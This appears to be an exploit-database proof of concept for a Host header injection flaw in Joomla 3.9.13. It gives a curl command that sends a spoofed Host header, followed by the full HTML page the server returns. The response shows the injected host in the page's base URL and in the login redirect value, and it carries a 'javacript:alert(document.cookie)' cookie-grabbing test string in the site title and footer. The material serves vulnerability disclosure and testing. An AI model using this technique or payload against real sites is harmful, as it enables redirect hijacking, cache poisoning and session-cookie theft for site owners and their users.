Joomla version 3.9.13 suffers from a host header injection vulnerability.
8346eed555e87022e9f2c87ca2cd63d9
# Exploit Title: Joomla 3.9.13 - 'Host' Header Injection
# Author: Pablo Santiago
# Date: 2019-11-12
# Vendor Homepage: https://www.joomla.org/
# Source: https://downloads.joomla.org/cms/joomla3/3-9-13/Joomla_3-9-13-Stable-Full_Package.zip?format=zip
# Version: 3.9.13
# CVE : N/A
# Tested on: Windows 10
#PoC
curl http://localhost/joomla/ -H "Host: exploit-db.com"
<!DOCTYPE html>
<html lang="en-gb" dir="ltr">
<head>
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<meta charset="utf-8" />
<base href="http://exploit-db.com/joomla/" />
<meta name="description" content="javacript:alert(document.cookie)" />
<meta name="generator" content="Joomla! - Open Source Content
Management" />
<title>Home</title>
<link href="/joomla/index.php?format=feed&type=rss"
rel="alternate" type="application/rss+xml" title="RSS 2.0" />
<link href="/joomla/index.php?format=feed&type=atom"
rel="alternate" type="application/atom+xml" title="Atom 1.0" />
<link href="/joomla/templates/protostar/favicon.ico"
rel="shortcut icon" type="image/vnd.microsoft.icon" />
<link href="/joomla/templates/protostar/css/template.css?190197408a83fd286a9c42640a0f2f22"
rel="stylesheet" />
<link href="https://fonts.googleapis.com/css?family=Open+Sans"
rel="stylesheet" />
<style>
h1, h2, h3, h4, h5, h6, .site-title {
font-family: 'Open Sans', sans-serif;
}
</style>
<script type="application/json" class="joomla-script-options
new">{"csrf.token":"d460ac322fbbb6ae67cc78034182d9e1","system.paths":{"root":"\/joomla","base":"\/joomla"},"system.keepalive":{"interval":840000,"uri":"\/joomla\/index.php\/component\/ajax\/?format=json"}}</script>
<script
src="/joomla/media/jui/js/jquery.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/jquery-noconflict.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/jquery-migrate.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/system/js/caption.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/media/jui/js/bootstrap.min.js?190197408a83fd286a9c42640a0f2f22"></script>
<script
src="/joomla/templates/protostar/js/template.js?190197408a83fd286a9c42640a0f2f22"></script>
<!--[if lt IE 9]><script
src="/joomla/media/jui/js/html5.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
<script
src="/joomla/media/system/js/core.js?190197408a83fd286a9c42640a0f2f22"></script>
<!--[if lt IE 9]><script
src="/joomla/media/system/js/polyfill.event.js?190197408a83fd286a9c42640a0f2f22"></script><![endif]-->
<script
src="/joomla/media/system/js/keepalive.js?190197408a83fd286a9c42640a0f2f22"></script>
<script>
jQuery(window).on('load', function() {
new JCaption('img.caption');
jQuery(function($){ initTooltips(); $("body").on("subform-row-add",
initTooltips); function initTooltips (event, container) { container =
container || document;$(container).find(".hasTooltip").tooltip({"html":
true,"container": "body"});} });
</script>
</head>
<body class="site com_content view-featured no-layout no-task itemid-101">
<!-- Body -->
<div class="body" id="top">
<div class="container">
<!-- Header -->
<header class="header" role="banner">
<div class="header-inner clearfix">
<a class="brand pull-left"
href="/joomla/">
<span
class="site-title"
title="javacript:alert(document.cookie)">javacript:alert(document.cookie)</span>
</a>
<div class="header-search pull-right">
</div>
</div>
</header>
<div class="row-fluid">
<main
id="content" role="main" class="span9">
<!-- Begin Content -->
<div id="system-message-container">
</div>
<div class="blog-featured"
itemscope itemtype="https://schema.org/Blog">
<div class="page-header">
<h1>
Home </h1>
</div>
</div>
<div class="clearfix"></div>
<div aria-label="breadcrumbs"
role="navigation">
<ul itemscope itemtype="https://schema.org/BreadcrumbList"
class="breadcrumb">
<li>
You are here:
</li>
<li
itemprop="itemListElement" itemscope
itemtype="https://schema.org/ListItem" class="active">
<span itemprop="name">
Home
</span>
<meta itemprop="position" content="1">
</li>
</ul>
</div>
<!-- End Content -->
</main>
<div id="aside" class="span3">
<!-- Begin Right Sidebar -->
<div class="well
_menu"><h3 class="page-header">Main Menu</h3><ul class="nav menu
mod-list">
<li class="item-101 default current active"><a
href="/joomla/index.php" >Home</a></li></ul>
</div><div class="well "><h3 class="page-header">Login Form</h3><form
action="/joomla/index.php" method="post" id="login-form"
class="form-inline">
<div class="userdata">
<div id="form-login-username" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span
class="icon-user hasTooltip" title="Username"></span>
<label
for="modlgn-username" class="element-invisible">Username</label>
</span>
<input
id="modlgn-username" type="text" name="username" class="input-small"
tabindex="0" size="18" placeholder="Username" />
</div>
</div>
</div>
<div id="form-login-password" class="control-group">
<div class="controls">
<div class="input-prepend">
<span class="add-on">
<span
class="icon-lock hasTooltip" title="Password">
</span>
<label
for="modlgn-passwd" class="element-invisible">Password
</label>
</span>
<input
id="modlgn-passwd" type="password" name="password" class="input-small"
tabindex="0" size="18" placeholder="Password" />
</div>
</div>
</div>
<div
id="form-login-remember" class="control-group checkbox">
<label for="modlgn-remember"
class="control-label">Remember Me</label> <input id="modlgn-remember"
type="checkbox" name="remember" class="inputbox" value="yes"/>
</div>
<div id="form-login-submit"
class="control-group">
<div class="controls">
<button type="submit" tabindex="0"
name="Submit" class="btn btn-primary login-button">Log in</button>
</div>
</div>
<ul class="unstyled">
<li>
<a
href="/joomla/index.php/component/users/?view=remind&Itemid=101">
Forgot your username?</a>
</li>
<li>
<a
href="/joomla/index.php/component/users/?view=reset&Itemid=101">
Forgot your password?</a>
</li>
</ul>
<input type="hidden" name="option" value="com_users" />
<input type="hidden" name="task" value="user.login" />
<input type="hidden" name="return"
value="aHR0cDovL2V4cGxvaXQtZGIuY29tL2pvb21sYS8=" />
<input type="hidden"
name="d460ac322fbbb6ae67cc78034182d9e1" value="1" /> </div>
</form>
</div>
<!-- End Right Sidebar -->
</div>
</div>
</div>
</div>
<!-- Footer -->
<footer class="footer" role="contentinfo">
<div class="container">
<hr />
<p class="pull-right">
<a href="#top" id="back-top">
Back to Top
</a>
</p>
<p>
© 2019
javacript:alert(document.cookie) </p>
</div>
</footer>
</body>
</html>
#PoC Visual
https://imgur.com/a/IgO4ZxI